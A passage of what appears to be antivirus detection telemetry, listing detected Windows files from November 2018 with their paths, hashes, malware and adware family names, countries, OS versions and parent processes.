  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:04:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:33:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290c85', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290c85', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:40:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124412-8aa3c640', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_408c1ab0\\AVSCAN-20181104-124242-80B55C3D\\AVSCAN-20181104-124412-8AA3C640', filesize=2048000, name='HEUR/APC.#M1.#R1'), hash='b500de581700356962520b312158252db75db6d474ca8fd27f413334d366ed1a', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:44:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c82c', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c82c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:35:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00237d9f', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00237d9f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:14:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204620-7e53310f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-204620-7E53310F', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:46:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162943-81dc66e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a17b836b\\AVSCAN-20181104-162656-6E64D203\\AVSCAN-20181104-162943-81DC66E0', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:29:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-234301-a254c1c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181103-234149-95BAE435\\AVSCAN-20181103-234301-A254C1C5', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T06:41:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='remove.exe', filepath='C:\\Program Files (x86)\\Vivid WorkshopData ATI\\Uninstall_Vivid WorkshopData ATI\\resource\\remove.exe', filesize=192000, name='W32/Neshta.A.#M1.#R1'), hash='f68c9a46866cf12a0a16c591743948783854b0b9242ac4761987d934285dbffc', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Windows\\\\\\\\SERVIC~2\\\\\\\\LOCALS~1\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\3582-490\\\\\\\\ORIGIN~1.EXE\\\\\\" ', country='HU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\svchost.com', parentsize=41472, timestamp='2018-11-04T12:36:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T04:27:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='019 - potato [circle].exe', filepath='E:\\music\\music\\Vampires 652 P\\019 - POTATO [CIRCLE]\\019 - POTATO [CIRCLE].exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='fe98caeaf0e682cbe9e1cb945c22c78d2cd383a00682132a29c503bde28c8401', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:13:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fb953c7c09762cf0f87505902fb0f65d8508ce8ed30d12cea90168ebb4a80a9a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FB953C7C09762CF0F87505902FB0F65D8508CE8ED30D12CEA90168EBB4A80A9A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fb953c7c09762cf0f87505902fb0f65d8508ce8ed30d12cea90168ebb4a80a9a', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:50:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='daemontoolspro550-0388.exe', filepath='\\\\?\\F:\\Delphi Neu\\Delphi 2014.3 FULL\\Delphi 2014.3 FULL\\DAEMONToolsPro550-0388.exe', filesize=19904000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='f66a31e176ef3abc894ccde534753a48fe5ff4b75f094db7e9ae92163c6ee34d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:35:33Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avscan-20181101-211435-84f7ec5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d7426d2e\\AVSCAN-20181031-233120-EBE69076\\AVSCAN-20181101-211435-84F7EC5D', filesize=20000, name='APPL/Linkury.Gen2.#M1.#R1'), hash='47cfc01081109c4b441cc109030378b73fb44f74a87e4c4a12295cea35c1d899', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:15:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='20d8eee609bd1c6053b4d278f95aecefba2b7210bc971f0ae513ed2e0c644479', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\20D8EEE609BD1C6053B4D278F95AECEFBA2B7210BC971F0AE513ED2E0C644479', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='20d8eee609bd1c6053b4d278f95aecefba2b7210bc971f0ae513ed2e0c644479', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:42:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='skse_loader.exe', filepath='C:\\Users\\X\\Desktop\\Ablage\\skse_1_06_16\\skse_loader.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='17e26c7fc5bae6864a898278a4229b223706b7e2ab7b7ab543f0d06c46223503', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Jxy+eO6QvUGP8fi7.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T15:56:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='comm3.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\COMM3\\COMM3.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8ee1ae3b9eb955597095fd702bef4fce9f447068', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\8ee1ae3b9eb955597095fd702bef4fce9f447068', filesize=2112000, name='Adware/DealPly.25a0a4.#M1.#R1'), hash='25a0a400f0303d8f77edadd093db30413123768cb66a957616dafe58f8d9b416', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:45:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='etabs_2015.exe', filepath='C:\\Program Files\\Computers and Structures\\ETABS 2015\\CSiLicensing\\etabs_2015.exe', filesize=1152000, name='TR/Black.Gen2.#M300.#R100338'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:zaxfyQAmgkeVHgV\\\\\\/.1', country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T05:24:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:09:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160043-f1e41e0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160043-F1E41E0F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:31:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T18:15:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='torntv 2-bg.exe', filepath='\\\\?\\C:\\Windows.old\\Program Files\\Torntv 2\\Torntv 2-bg.exe', filesize=896000, name='ADWARE/CrossRider.Gen2.#M300.#R101244'), hash='38a75b7396d53b515662130fec4490c372e85cfb06b7c2082bf721c3f4e77a8a', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:36:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$DRa12244.15493\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T22:10:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194540-2ff500e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b332e29\\AVSCAN-20181102-192734-6E1A9BD8\\AVSCAN-20181102-194540-2FF500E9', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:45:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\视频编辑专家 9.1\\msimg32.dll', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R345'), hash='329e0f584efd6cfcdb1344f270757d35394cc548f31be46bedd3d16944895e68', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:02:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T16:32:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-115600-049a4362', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0d9d6d\\AVSCAN-20181102-115437-F893F4A4\\AVSCAN-20181102-115600-049A4362', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:55:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-162113-51531823', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4c4bdd08\\AVSCAN-20181102-162052-4CEDFDE0\\AVSCAN-20181102-162113-51531823', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T09:21:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-205208-25eadf29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1b74552d\\AVSCAN-20181102-204439-D7908571\\AVSCAN-20181102-205208-25EADF29', filesize=1056000, name='PUA/InstallCore.Gen7.#M1.#R1'), hash='0303f6a8f595004c1d07d61cc3f7aad928b84be3d46c0aec7e6163ef718a34ce', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:52:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f360fb328a8239d7bb34a83312cdc2a71f6bc246', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\f360fb328a8239d7bb34a83312cdc2a71f6bc246', filesize=2112000, name='Adware/DealPly.38f00c.#M1.#R1'), hash='38f00cebff5d91b0b5ce6cc5e911e21ddf717f8fa39a63cd291918e6b6e4c84a', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:22:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163120-be37f72f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77a1b0a3\\AVSCAN-20181102-163042-B92CD8C8\\AVSCAN-20181102-163120-BE37F72F', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:31:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2d6fd5b740a7f51298cd7047631a42895c721d95afd78155de062e58cc9df6ee', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2D6FD5B740A7F51298CD7047631A42895C721D95AFD78155DE062E58CC9DF6EE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2d6fd5b740a7f51298cd7047631a42895c721d95afd78155de062e58cc9df6ee', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:45:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='goopdate.dll', filepath='C:\\Program Files (x86)\\Ckikachcoihusy\\goopdate.dll', filesize=128000, name='HEUR/AGEN.1014186.#M1.#R1'), hash='0dd3a5f51f3139edc29338bf545981c0d56a9ff2fbc0c4b65a7d5607b89804b3', metadata=Row(cmdline='76401b8b-aa12-4d8e-b10f-eadc43fc6401', country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\Ckikachcoihusy\\vihght.exe', parentsize=685064, timestamp='2018-11-02T15:13:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-092817-3a734dae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea81adcc\\AVSCAN-20181102-092802-377AB97F\\AVSCAN-20181102-092817-3A734DAE', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:28:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T06:33:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\5EFH1S1L\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:16:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:50Z'), dt=datetime.date(2018, 11, 2)),
